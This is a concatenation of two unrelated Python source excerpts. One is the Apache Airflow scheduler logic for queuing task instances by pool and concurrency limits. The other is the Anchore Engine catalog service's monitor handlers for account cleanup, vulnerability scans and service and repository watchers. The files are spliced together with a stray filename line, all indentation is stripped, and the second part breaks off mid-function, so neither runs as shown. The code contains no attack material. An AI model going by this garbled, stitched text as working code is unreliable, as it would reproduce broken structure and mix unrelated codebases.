.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id.is_(None), not_(DR.run_id.like(DagRunType.BACKFILL_JOB.value + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
.filter(TI.state == State.SCHEDULED)
.all()
)
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
tis_to_set_to_queued = (
session
.query(TI)
.filter(TI.filter_for_tis(task_instances))
.filter(TI.state == State.SCHEDULED)
.with_for_update()
.all()
)
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session=None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
# pylint: disable=too-many-nested-blocks
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state in (State.FAILED, State.SUCCESS):
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception: # pylint: disable=broad-except
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested %d SimpleDAGs", len(simple_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files have been processed %d times",
self.num_runs)
break
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
__init__.py
|
import json
import os
import copy
import threading
import time
import pkg_resources
from sqlalchemy.exc import IntegrityError
# anchore modules
import anchore_engine.clients.anchoreio
import anchore_engine.common.helpers
import anchore_engine.common.images
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services import simplequeue
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.clients.services.common
from anchore_engine.clients import docker_registry
from anchore_engine import db
from anchore_engine.db import db_catalog_image, db_policybundle, db_queues, db_registries, db_subscriptions, \
db_accounts, db_anchore, db_services, db_events, AccountStates, AccountTypes, ArchiveTransitionRule
from anchore_engine.subsys import notifications, taskstate, logger, archive, object_store
from anchore_engine.services.catalog import catalog_impl
import anchore_engine.subsys.events as events
from anchore_engine.utils import AnchoreException
from anchore_engine.services.catalog.exceptions import TagManifestParseError, TagManifestNotFoundError, PolicyBundleValidationError
from anchore_engine.service import ApiService, LifeCycleStages
from anchore_engine.common.helpers import make_policy_record
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.services.catalog import archiver
from anchore_engine.subsys.object_store.config import DEFAULT_OBJECT_STORE_MANAGER_ID, ANALYSIS_ARCHIVE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY
##########################################################
# monitor section
def do_user_resources_delete(userId):
return_object = {}
httpcode = 500
resourcemaps = [
("subscriptions", db.db_subscriptions.get_all_byuserId, catalog_impl.do_subscription_delete),
("registries", db.db_registries.get_byuserId, catalog_impl.do_registry_delete),
("evaluations", db.db_policyeval.get_all_byuserId, catalog_impl.do_evaluation_delete),
("policybundles", db.db_policybundle.get_all_byuserId, catalog_impl.do_policy_delete),
("images", db.db_catalog_image.get_all_byuserId, catalog_impl.do_image_delete),
("archive", db.db_archivemetadata.list_all_byuserId, catalog_impl.do_archive_delete),
]
limit = 2048
all_total = 0
all_deleted = 0
for resourcename,getfunc,delfunc in resourcemaps:
try:
deleted = 0
total = 0
with db.session_scope() as dbsession:
records = getfunc(userId, session=dbsession, limit=limit)
total = len(records)
for record in records:
delfunc(userId, record, dbsession, force=True)
deleted = deleted + 1
return_object['total_{}'.format(resourcename)] = total
return_object['total_{}_deleted'.format(resourcename)] = deleted
all_total = all_total + total
all_deleted = all_deleted + deleted
if total or deleted:
logger.debug("deleted {} / {} {} records for user {}".format(deleted, total, resourcename, userId))
except Exception as err:
logger.warn("failed to delete resources in {} for user {}, will continue and try again - exception: {}".format(resourcename, userId, err))
return_object['all_total'] = all_total
return_object['all_deleted'] = all_deleted
httpcode = 200
return(return_object, httpcode)
def handle_account_resource_cleanup(*args, **kwargs):
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
# iterate over all deleted account records, and perform resource cleanup for that account. If there are no longer any resources associated with the account id, then finally delete the account record itself
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.deleting, include_service=False)
for account in accounts:
userId = account['name']
logger.debug("Inspecting account {} for resource cleanup tasks".format(userId))
try:
return_object, httpcode = do_user_resources_delete(userId)
logger.debug("Resources for deleted account cleaned-up: {} - {}".format(return_object, httpcode))
if return_object.get('all_total', None) == 0 and return_object.get('all_deleted', None) == 0:
logger.debug("Resources for pending deleted user {} cleared - deleting account".format(userId))
with db.session_scope() as session:
mgr = manager_factory.for_session(session)
mgr.delete_account(userId)
else:
logger.debug("resources for pending deleted user {} not entirely cleared this cycle".format(userId))
except Exception as err:
raise Exception("failed to delete user {} resources - exception: {}".format(userId, err))
except Exception as err:
logger.warn("failure in handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_vulnerability_scan(*args, **kwargs):
global feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine'])
if not all_ready:
logger.debug("FIRING DONE: feed syncer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# vulnerability scans
doperform = False
vuln_subs = []
for subscription_type in ['vuln_update']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in vuln_subs:
vuln_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in vuln_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
current_imageDigest = image_records[0]['imageDigest']
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
doperform = True
if doperform:
logger.debug("calling vuln scan perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_vulnerability_scan(userId, imageDigest, dbsession, scantag=fulltag, force_refresh=False, is_current=(imageDigest==current_imageDigest))
except Exception as err:
logger.warn("vulnerability scan failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in feed sync handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_service_watcher(*args, **kwargs):
# global latest_service_records
cycle_timer = kwargs['mythread']['cycle_timer']
max_service_heartbeat_timer = 300
max_service_orphaned_timer = 3600
max_service_cleanup_timer = 86400
while (True):
logger.debug("FIRING: service watcher")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
event_account = anchore_engine.configuration.localconfig.ADMIN_ACCOUNT_NAME
anchore_services = db_services.get_all(session=dbsession)
# update the global latest service record dict in services.common
# latest_service_records.update({"service_records": copy.deepcopy(anchore_services)})
# fields to update each tick:
#
# heartbeat (current time)
# status (true/false)
# status_message (state of service)
# short_description(api return)
#
for service in anchore_services:
event = None
service_update_record = {}
if service['servicename'] == 'catalog' and service['hostid'] == localconfig['host_id']:
status = anchore_engine.subsys.servicestatus.get_status(service)
service_update_record.update({'heartbeat': int(time.time()), 'status': True,
'status_message': taskstate.complete_state('service_status'),
'short_description': json.dumps(status)})
else:
try:
try:
status = json.loads(service['short_description'])
except:
status = {'up': False, 'available': False}
# set to down until the response can be parsed
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status description"
try:
# NOTE: this is where any service-specific decisions based on the 'status' record could happen - now all services are the same
if status['up'] and status['available']:
if time.time() - service['heartbeat'] > max_service_heartbeat_timer:
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - disabling service".format(max_service_heartbeat_timer, service['hostid'], service['servicename']))
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_heartbeat_timer)
# Trigger an event to log the down service
event = events.ServiceDownEvent(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_heartbeat_timer))
else:
service_update_record['status'] = True
service_update_record['status_message'] = taskstate.complete_state('service_status')
try:
service_update_record['short_description'] = json.dumps(status)
except:
service_update_record['short_description'] = str(status)
else:
# handle the down state transitions
if time.time() - service['heartbeat'] > max_service_cleanup_timer:
# remove the service entirely
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - removing service".format(max_service_cleanup_timer, service['hostid'], service['servicename']))
try:
# remove the service record from DB
removed_hostid = service['hostid']
removed_servicename = service['servicename']
removed_base_url = service['base_url']
db_services.delete(removed_hostid, removed_servicename, session=dbsession)
service_update_record = None
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceRemovedEvent(user_id=event_account, name=removed_servicename,
host=removed_hostid,
url=removed_base_url,
cause='no heartbeat from service in ({}) seconds'.format(
max_service_cleanup_timer))
except Exception as err:
logger.warn("attempt to remove service {}/{} failed - exception: {}".format(service.get('hostid'), service.get('servicename'), err))
elif time.time() - service['heartbeat'] > max_service_orphaned_timer:
# transition down service to orphaned
logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - orphaning service".format(max_service_orphaned_timer, service['hostid'], service['servicename']))
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.orphaned_state('service_status')
service_update_record[
'short_description'] = "no heartbeat from service in ({}) seconds".format(
max_service_orphaned_timer)
if service['status_message'] != taskstate.orphaned_state('service_status'):
# Trigger an event to log the orphaned service, only on transition
event = events.ServiceOrphanedEvent(user_id=event_account, name=service['servicename'],
host=service['hostid'],
url=service['base_url'],
cause='no heartbeat from service in ({}) seconds'.format(
max_service_orphaned_timer))
except Exception as err:
logger.warn(
"could not get/parse service status record for service: - exception: " + str(err))
except Exception as err:
logger.warn(
"could not get service status: " + str(service) + " : exception: " + str(err) + " : " + str(
err.__dict__))
if service_update_record:
service_update_record['status'] = False
service_update_record['status_message'] = taskstate.fault_state('service_status')
service_update_record['short_description'] = "could not get service status"
finally:
if event:
_add_event(event)
if service_update_record:
service.update(service_update_record)
try:
db_services.update_record(service, session=dbsession)
except Exception as err:
logger.warn("could not update DB: " + str(err))
logger.debug("FIRING DONE: service watcher")
try:
kwargs['mythread']['last_return'] = True
except:
pass
time.sleep(cycle_timer)
return (True)
def handle_repo_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
dbfilter = {}
with db.session_scope() as dbsession:
dbfilter['subscription_type'] = 'repo_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
event = None
try:
regrepo = subscription_record['subscription_key']
if subscription_record['subscription_value']:
subscription_value = json.loads(subscription_record['subscription_value'])
if 'autosubscribe' not in subscription_value:
subscription_value['autosubscribe'] = False
if 'lookuptag' not in subscription_value:
subscription_value['lookuptag'] = 'latest'
else:
subscription_value = {'autosubscribe': False, 'lookuptag': 'latest'}
stored_repotags = subscription_value.get('repotags', [])
fulltag = regrepo + ":" + subscription_value.get('lookuptag', 'latest')
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=False,
registry_creds=(None, None))
# List tags
try:
curr_repotags = docker_registry.get_repo_tags(userId, image_info, registry_creds=registry_creds)
except AnchoreException as e:
event = events.ListTagsFail(user_id=userId, registry=image_info.get('registry', None),
repository=image_info.get('repo', None), error=e.to_dict())
raise e
autosubscribes = ['analysis_update']
if subscription_value['autosubscribe']:
autosubscribes.append("tag_update")
repotags = set(curr_repotags).difference(set(stored_repotags))
if repotags:
logger.debug("new tags to watch in repo (" + str(regrepo) + "): " + str(repotags))
added_repotags = stored_repotags
for repotag in repotags:
try:
fulltag = image_info['registry'] + "/" + image_info['repo'] + ":" + repotag
logger.debug("found new tag in repo: " + str(fulltag))
new_image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
manifest = None
try:
if 'manifest' in new_image_info:
try:
manifest = json.dumps(new_image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag,
manifest=new_image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
raise
with db.session_scope() as dbsession:
logger.debug("adding/updating image from repo scan " + str(new_image_info['fulltag']))
# add the image
image_records = catalog_impl.add_or_update_image(dbsession, userId,
new_image_info['imageId'],
tags=[new_image_info['fulltag']],
digests=[new_image_info['fulldigest']],
parentdigest=new_image_info.get('parentdigest', None),
manifest=manifest)
# add the subscription records with the configured default activations
for stype in anchore_engine.common.subscription_types:
activate = False
if stype == 'repo_update':
continue
elif stype in autosubscribes:
activate = True
db_subscriptions.add(userId, new_image_info['fulltag'], stype, {'active': activate},
session=dbsession)
added_repotags.append(repotag)
except Exception as err:
logger.warn(
"could not add discovered tag from repo (" + str(fulltag) + ") - exception: " + str(
err))
# update the subscription record with the latest successfully added image tags
with db.session_scope() as dbsession:
subscription_value['repotags'] = added_repotags
subscription_value['tagcount'] = len(added_repotags)
db_subscriptions.update(userId, regrepo, 'repo_update',
{'subscription_value': json.dumps(subscription_value)},
session=dbsession)
else:
logger.debug("no new images in watched repo (" + str(regrepo) + "): skipping")
except Exception as err:
logger.warn("failed to process repo_update subscription - exception: " + str(err))
finally:
if event:
_add_event(event)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_image_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
with db.session_scope() as dbsession:
dbfilter = {}
dbfilter['subscription_type'] = 'tag_update'
